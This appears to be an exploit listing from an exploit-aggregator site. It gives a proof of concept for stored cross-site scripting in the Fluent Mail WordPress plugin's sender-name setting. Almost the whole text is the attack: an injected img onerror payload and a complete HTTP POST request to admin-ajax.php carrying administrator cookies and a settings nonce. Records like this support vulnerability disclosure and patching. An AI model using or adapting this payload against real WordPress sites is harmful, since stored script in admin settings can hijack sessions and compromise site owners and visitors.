## https://sploitus.com/exploit?id=WPEX-ID:8B8D316B-96B2-4CDC-9DA5-C9EA6108A85B
PoC (payload submitted in the `connection[sender_name]` setting)
------------------------------
connection[sender_name]=<s>here</s><img src=1 onerror=alert(/XSS/)>
------------------------------
Full Request PoC (sent with an administrator session cookie and a settings nonce)
------------------------------
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.example.com:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: */*
Accept-Language: ja,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://target.example.com:8000/wp-admin/options-general.php?page=fluent-mail
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 377
Origin: http://target.example.com:8000
DNT: 1
Connection: close
Cookie: [admin cookies]

connection%5Bsender_name%5D=%3Cs%3Ehere%3C%2Fs%3E%3Cimg+src%3D1+onerror%3Dalert(%2FXSS%2F)%3E&connection%5Bsender_email%5D=test%40example.com&connection%5Bforce_from_name%5D=no&connection%5Bforce_from_email%5D=yes&connection%5Breturn_path%5D=yes&connection%5Bkey_store%5D=db&connection%5Bprovider%5D=default&connection_key=false&action=fluentmail-post-settings&nonce=64447f740d
------------------------------